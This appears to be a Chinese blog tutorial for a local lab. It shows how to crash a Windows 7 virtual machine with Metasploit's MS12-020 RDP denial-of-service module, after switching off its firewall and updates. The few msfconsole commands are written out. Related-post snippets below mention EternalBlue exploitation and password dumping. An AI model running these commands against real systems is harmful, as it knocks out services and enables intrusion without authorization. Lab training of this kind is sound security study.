kali 漏洞攻击 win7演示

最新推荐文章于 2024-04-17 10:32:05 发布
最新推荐文章于 2024-04-17 10:32:05 发布
阅读量476 收藏 9
点赞数 9
文章标签: linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a_159357_/article/details/135156256
版权

#教学仅限于本地的虚拟机攻击

准备系统镜像
kali    win7

#以VMware Workstation Pro的虚拟机演示

    首先在主页找到编辑--->虚拟网络编辑器-->添加网络-->VMnet4-->lp改为192.168.2.0 -->

    将kali和win7的网络适配器都改为VMnet4

    1. 配置kali环境 (以下代码是直接在root用户下进行)

7e819a81515741519d33af0aed8f388e.jpg

 

2.配置win7环境 
    更改ip地址: 

    右键网络属性-->更改适配器设置-->右键本地网络属性--> Internet 协议版本4

a77167f4bc28441682db69907bbafe9f.jpg

 

关闭防火墙:

    控制面板-->系统和安全-->Windows防火墙-->打开或关闭Windows防火墙

4f8b991a00c74af4a7dd19c71f07b926.jpg

 

启用远程桌面: 

    右键计算机属性-->远程设置-->远程

9ed094745b564cdfaa5b03061c62a97b.jpg

 

卸载程序:

    控制面板-->卸载程序-->查看已安装的更新-->全部卸载

697ce8754bb64f8bad9ed0c1395255c2.jpg

 

                        ( 最后重启win7)

 

    3.准备攻击
    查看两个系统网络是否ping通:

 

3f9a8a05d195444287bbafa7b64d8062.jpg

475799860eb54c2ab26fadea01fed6c4.jpg 

 设置攻击框架并进行攻击:

msfconsole
 
search dos
 
search ms12-020
 
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
 
set rhost 192.168.2.3
 
run
 
(以上是设置攻击框架 选择漏洞 最后攻击的过程)

结果展示:

70fe8bec6e3b4867be53f2e1d03a07c7.png

              (win7重启电脑即可恢复正常)

 

金木研_—_
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kail使用msf工具利用永恒之蓝漏洞攻击win7
m0_73948163的博客
12-30 765
show options 另外Required为yes的也需要设置。我们输入shell就可以进入到win7的cmd。最后使用creds_all命令抓取明文密码。接下来我们可以查看需要设置的IP地址和端口。这上面有三个可以利用的漏洞我们选择第一个。其实还有很多可以执行的操作就不一一列举了。还可以使用screenshot命令截屏。还可以使用mimkatz抓取明文密码。除此之外还需要设置payload。先使用hashdump抓取密码。这是几个渗透后可以使用的命令。我们查看win7的IP。设置完成后就进行攻击
简单到有手就行!!!Kali msf打win7永恒之蓝漏洞
weixin_54475173的博客
01-04 1032
kali msf 打windows7 永恒之蓝
kali渗透攻击
abc3106887422的博客
04-17 1016
(1)菜单(2)工具栏(3)命令行2、Metasploit的常用模块:(1)exploit(漏洞渗透模块)(2)payload(攻击载荷模块)(3)auxiliary(辅助模块)(4)post(后渗透攻击模块)3、帮助help和?4、命令几个种类:(1)核心命令core command(2)模块命令module command(3)任务命令job command(4)资源命令resource script command。
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1736
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 818
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用的漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用的漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 3508
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
Kali——Metasploit的漏洞渗透(对操作系统、应用程序、客户端攻击
董哥的黑板报
07-24 3718
一、查看Metasploit的漏洞渗透模块 从左到右依次为: 序号、模块的名称、披露日期、威胁等级、Check、模块的描述 模块的威胁等级分为: excellent(该模块在绝大多数环境下正常执行)、great、good、normal(模块可以执行,但是对目标有严格的要求)、average、lowRank(这类模块很难执行)、manual(该模块几乎不能执行) 模块名称的命名规则: 三...
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
49-49.渗透测试-Kali Linux漏洞扫描.mp4
最新发布
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
Kali Linux WiFi攻击与防护.rar
11-03
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
KALI利用MS17-010漏洞入侵
Shass的博客
11-27 6406
KALI利用MS17-010漏洞入侵 实验环境 靶机 : Windows Server 2008 R2 ,开放445端口( Windows防火墙不必关闭)。 攻击机: KALI,利用Meterpreter渗透工具漏洞︰MS17-010永恒之蓝(EternalBlue)漏洞。 操作步骤 1)先利用NMAP扫描靶机是否开启了445端口。 2)在kali上启动msfconsole 3)扫描靶机的漏洞情况 4)利用MS17-010漏洞攻击靶机 msf5 auxiliary(scanner/smb/smb_ms
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3319
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
kali系统进行DoS攻击教程(虚拟机单人可玩)
2301_77296801的博客
09-06 1350
DoS攻击是指恶意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。第三次握手:客户端收到服务器的SYN十ACK包,向服务器发送确认包ACK(ACK=j+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手,客户端与服务器开始传送数据。点击编辑-->虚拟网络编辑器-->添加网络-->vmnet 4-->修改。
DOS攻击
yanglei818的博客
09-11 207
概念:DOS全称为Disk Operating System,意思是“磁盘操作系统”。DOS攻击通常是利用传输协议的漏洞、系统存在的漏洞、服务的漏洞,对目标系统发起大规模的进攻,用超出目标处理能力的海量数据包消耗可用系统资源、带宽资源等,或造成程序缓冲区溢出错误,致使其无法处理合法用户的正常请求,无法提供正常服务,最终致使网络服务瘫痪,甚至引起系统死机。这是破坏攻击目标正常运行的一种“损人不利己”的攻击手段目录一、设置Vmnet 4网卡 网段为:192.168.2.0。
Kali学习 | 漏洞利用:4.5 渗透攻击MySQL数据库服务
qq_43233085的博客
01-10 2086
Kali学习 | 漏洞利用:4.5 渗透攻击MySQL数据库服务MySQL介绍操作步骤 MySQL介绍 MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle公司。 在Metasploitable系统中,MySQL的身份认证存在漏洞。 该漏洞有可能会让潜在的攻击者不必提供正确的身份证书便可访问MySQL数据库。 所以,用户可以利用该漏洞,对MySQL服务进行渗透攻...
kali之metasploit工具渗透案例 --- 小黑超细详解
G_WEB_Xie的博客
09-12 1732
metasploit简称(MSF),是kali的最强渗透工具之一,称之为能黑掉整个宇宙的工具。在之前的文章中详细介绍了MSF工具的使用以及各个模块的说明,这篇文章作为案例做一次详解。
kali基础渗透学习,永恒之蓝,木马实战
killsime的博客
04-08 1471
即 MetaSploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。可以满足渗透测试的全过程metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击本质是利用别人开发好的工具,只能对一些老旧系统攻击如下,模拟使用msf利用永恒之蓝漏洞(因为可以导致蓝屏命名)在终端输入下面代码启动msfdb initmsfconsole可以db_status。
kali怎么渗透win7
05-10
在渗透测试中,Kali Linux是一个非常有用的工具集,它包含了许多常用的工具和漏洞利用脚本。下面是一个基本的win7渗透测试流程: 1. 确定目标IP地址 2. 扫描目标主机的开放端口,使用nmap命令:nmap -sS -sV -O ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值